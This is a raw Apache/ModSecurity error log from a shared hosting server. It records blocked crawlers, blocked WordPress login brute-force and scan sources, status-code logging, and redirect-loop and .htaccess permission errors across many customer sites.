[Tue May 26 19:12:20.396865 2026] [security2:error] [pid 18465:tid 18624] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjO06GHndkguR9cLKFxQAAABw"]
[Tue May 26 19:12:21.380653 2026] [security2:error] [pid 18465:tid 18653] [client 74.7.230.7:45090] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.maharajancars.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWjPU6GHndkguR9cLKGFgAAOWE"]
[Tue May 26 19:12:21.798934 2026] [security2:error] [pid 18465:tid 18658] [client 74.7.244.58:46042] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.mahehealthcare.com.freshmindsolutions.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWjPU6GHndkguR9cLKGLwAAPmU"]
[Tue May 26 19:12:21.801396 2026] [security2:error] [pid 18465:tid 18668] [client 74.7.228.41:55650] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.mahehealthcare.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWjPU6GHndkguR9cLKGMAAASAw"]
[Tue May 26 19:12:22.500158 2026] [security2:error] [pid 18465:tid 18631] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjPk6GHndkguR9cLKGRgAAACM"]
[Tue May 26 19:12:24.434765 2026] [security2:error] [pid 18465:tid 18717] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjQE6GHndkguR9cLKGuAAAAHk"]
[Tue May 26 19:12:26.544057 2026] [security2:error] [pid 18465:tid 18668] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjQk6GHndkguR9cLKHKQAAAEg"]
[Tue May 26 19:12:26.552951 2026] [core:error] [pid 18465:tid 18617] [client 205.210.31.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:12:26.552965 2026] [core:error] [pid 18465:tid 18617] [client 205.210.31.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:12:28.749579 2026] [security2:error] [pid 18465:tid 18597] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjRE6GHndkguR9cLKHjQAAAAI"]
[Tue May 26 19:12:30.101200 2026] [security2:error] [pid 18465:tid 18641] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjRU6GHndkguR9cLKH4AAAAC0"]
[Tue May 26 19:12:30.162391 2026] [core:crit] [pid 18465:tid 18711] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:12:32.637995 2026] [security2:error] [pid 18465:tid 18691] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjSE6GHndkguR9cLKIZwAAAF8"]
[Tue May 26 19:12:33.220517 2026] [security2:error] [pid 18465:tid 18599] [client 185.191.171.9:25630] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWjSU6GHndkguR9cLKIpwAAAAQ"]
[Tue May 26 19:12:33.220670 2026] [security2:error] [pid 18465:tid 18599] [client 185.191.171.9:25630] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWjSU6GHndkguR9cLKIpwAAAAQ"]
[Tue May 26 19:12:34.637688 2026] [security2:error] [pid 18465:tid 18660] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjSk6GHndkguR9cLKI1QAAAEA"]
[Tue May 26 19:12:36.247825 2026] [security2:error] [pid 18465:tid 18600] [client 212.32.49.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjS06GHndkguR9cLKJLAAAAAU"]
[Tue May 26 19:12:36.976770 2026] [security2:error] [pid 18465:tid 18635] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjTE6GHndkguR9cLKJTgAAACc"]
[Tue May 26 19:12:36.984161 2026] [security2:error] [pid 18465:tid 18508] [remote 213.171.208.62:34296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjTE6GHndkguR9cLKJVQAACyo"]
[Tue May 26 19:12:38.902461 2026] [security2:error] [pid 18465:tid 18527] [remote 213.171.208.62:34296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjTk6GHndkguR9cLKJsgAAYz0"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:12:39.013931 2026] [security2:error] [pid 18465:tid 18679] [client 77.68.83.86:49528] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.83.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/images/images/cache.php"] [unique_id "ahWjT06GHndkguR9cLKJuwAAAFM"], referer: www.google.com
[Tue May 26 19:12:39.050273 2026] [security2:error] [pid 18465:tid 18651] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjTk6GHndkguR9cLKJpQAAADc"]
[Tue May 26 19:12:39.662380 2026] [core:crit] [pid 18465:tid 18721] (13)Permission denied: [client 40.77.167.143:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:12:40.202492 2026] [security2:error] [pid 18465:tid 18486] [remote 20.153.140.50:38352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 50.140.153.20.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjUE6GHndkguR9cLKJ5AAAHRQ"]
[Tue May 26 19:12:40.726174 2026] [security2:error] [pid 18465:tid 18467] [remote 20.153.140.50:38352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 50.140.153.20.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjUE6GHndkguR9cLKKDAAAPAE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:12:41.016996 2026] [security2:error] [pid 18465:tid 18701] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjUE6GHndkguR9cLKKCQAAAGk"]
[Tue May 26 19:12:41.414204 2026] [security2:error] [pid 18465:tid 18569] [remote 92.205.109.21:42838] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWjUU6GHndkguR9cLKKKAAAWmc"]
[Tue May 26 19:12:42.449999 2026] [security2:error] [pid 18465:tid 18476] [remote 132.148.78.219:42764] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.78.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjUk6GHndkguR9cLKKYwAAKgo"]
[Tue May 26 19:12:42.636742 2026] [security2:error] [pid 18465:tid 18586] [remote 92.205.109.21:42838] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWjUk6GHndkguR9cLKKagAACXg"], referer: https://canopykaapi.com/wp-login.php
[Tue May 26 19:12:43.077501 2026] [security2:error] [pid 18465:tid 18694] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjUk6GHndkguR9cLKKeQAAAGI"]
[Tue May 26 19:12:43.811064 2026] [security2:error] [pid 18465:tid 18612] [client 114.119.151.179:62909] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rohiniventures.com"] [uri "/our-mission/"] [unique_id "ahWjU06GHndkguR9cLKKrgAAABE"], referer: https://rohiniventures.com/coffee
[Tue May 26 19:12:43.964803 2026] [core:crit] [pid 18465:tid 18680] (13)Permission denied: [client 40.77.167.55:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:12:44.196854 2026] [core:crit] [pid 18465:tid 18603] (13)Permission denied: [client 40.77.167.55:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:12:44.313678 2026] [security2:error] [pid 18465:tid 18658] [client 185.191.171.18:25322] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahWjVE6GHndkguR9cLKK1AAAAD4"]
[Tue May 26 19:12:44.313773 2026] [security2:error] [pid 18465:tid 18658] [client 185.191.171.18:25322] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahWjVE6GHndkguR9cLKK1AAAAD4"]
[Tue May 26 19:12:44.348309 2026] [security2:error] [pid 18465:tid 18493] [remote 132.148.78.219:42764] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.78.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjVE6GHndkguR9cLKK2AAAHxs"], referer: https://triviewsolutions.com/wp-login.php
[Tue May 26 19:12:44.460273 2026] [security2:error] [pid 18465:tid 18663] [client 52.167.144.55:37509] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahWjU06GHndkguR9cLKKkgAAQ3o"]
[Tue May 26 19:12:44.514319 2026] [security2:error] [pid 18465:tid 18661] [client 66.249.68.130:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWjVE6GHndkguR9cLKK2wAAAEE"]
[Tue May 26 19:12:44.614930 2026] [security2:error] [pid 18465:tid 18655] [client 85.208.96.202:29252] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/pages/services-wide/"] [unique_id "ahWjVE6GHndkguR9cLKK7gAAADs"]
[Tue May 26 19:12:44.615042 2026] [security2:error] [pid 18465:tid 18655] [client 85.208.96.202:29252] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/pages/services-wide/"] [unique_id "ahWjVE6GHndkguR9cLKK7gAAADs"]
[Tue May 26 19:12:45.086081 2026] [security2:error] [pid 18465:tid 18716] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjVE6GHndkguR9cLKK8QAAAHg"]
[Tue May 26 19:12:45.322079 2026] [core:crit] [pid 18465:tid 18631] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:12:46.413766 2026] [security2:error] [pid 18465:tid 18543] [remote 165.245.181.0:52365] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 0.181.245.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-login.php"] [unique_id "ahWjVk6GHndkguR9cLKLTwAATU0"]
[Tue May 26 19:12:47.082066 2026] [security2:error] [pid 18465:tid 18721] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjVk6GHndkguR9cLKLcgAAAH0"]
[Tue May 26 19:12:47.407103 2026] [core:error] [pid 18465:tid 18660] [client 35.94.96.83:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:12:47.407123 2026] [core:error] [pid 18465:tid 18660] [client 35.94.96.83:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:12:47.510600 2026] [core:error] [pid 18465:tid 18629] [client 35.94.96.83:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:12:47.510622 2026] [core:error] [pid 18465:tid 18629] [client 35.94.96.83:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:12:47.670566 2026] [security2:error] [pid 18465:tid 18645] [client 66.249.68.129:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWjV06GHndkguR9cLKLrQAAADE"]
[Tue May 26 19:12:49.102199 2026] [security2:error] [pid 18465:tid 18614] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjWE6GHndkguR9cLKL7QAAABM"]
[Tue May 26 19:12:51.039060 2026] [security2:error] [pid 18465:tid 18646] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjWk6GHndkguR9cLKMWAAAADI"]
[Tue May 26 19:12:51.631469 2026] [core:error] [pid 18465:tid 18649] [client 159.203.46.145:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:12:51.631499 2026] [core:error] [pid 18465:tid 18649] [client 159.203.46.145:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:12:52.381430 2026] [security2:error] [pid 18465:tid 18671] [client 180.93.128.110:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWjXE6GHndkguR9cLKMrwAAAEs"], referer: https://www.anujtradingco.com/
[Tue May 26 19:12:53.131075 2026] [security2:error] [pid 18465:tid 18634] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjXE6GHndkguR9cLKMxgAAACY"]
[Tue May 26 19:12:55.151809 2026] [security2:error] [pid 18465:tid 18636] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjXk6GHndkguR9cLKNOAAAACg"]
[Tue May 26 19:12:55.402325 2026] [security2:error] [pid 18465:tid 18600] [client 180.93.128.110:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWjX06GHndkguR9cLKNXAAAAAU"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1098827&moderation-hash=8dca1239416503e328e7bfe6af676fd4
[Tue May 26 19:12:56.187096 2026] [security2:error] [pid 18465:tid 18529] [remote 62.60.130.182:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWjYE6GHndkguR9cLKNjQAACT8"]
[Tue May 26 19:12:56.663995 2026] [security2:error] [pid 18465:tid 18677] [client 114.119.136.72:20135] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones"] [unique_id "ahWjYE6GHndkguR9cLKNuwAAAFE"], referer: http://www.coles-directory.com/science_and_technology/reference/computers_and_internet/blogs/eclectic/entertainment/magic
[Tue May 26 19:12:57.183278 2026] [security2:error] [pid 18465:tid 18692] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjYE6GHndkguR9cLKNwwAAAGA"]
[Tue May 26 19:12:57.269019 2026] [security2:error] [pid 18465:tid 18523] [remote 62.60.130.182:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWjYU6GHndkguR9cLKN3QAAVDk"], referer: https://www.facebook.com/
[Tue May 26 19:12:58.835127 2026] [security2:error] [pid 18465:tid 18476] [remote 211.23.68.235:50207] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjYk6GHndkguR9cLKOHwAARwo"]
[Tue May 26 19:12:59.308373 2026] [security2:error] [pid 18465:tid 18671] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjYk6GHndkguR9cLKOKAAAAEs"]
[Tue May 26 19:13:00.272802 2026] [security2:error] [pid 18465:tid 18682] [client 14.230.159.133:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjY06GHndkguR9cLKOYAAAAFY"]
[Tue May 26 19:13:00.432746 2026] [security2:error] [pid 18465:tid 18481] [remote 62.60.130.182:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWjZE6GHndkguR9cLKOfwAAGw8"], referer: https://t.co/
[Tue May 26 19:13:01.002545 2026] [core:crit] [pid 18465:tid 18693] (13)Permission denied: [client 40.77.167.143:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
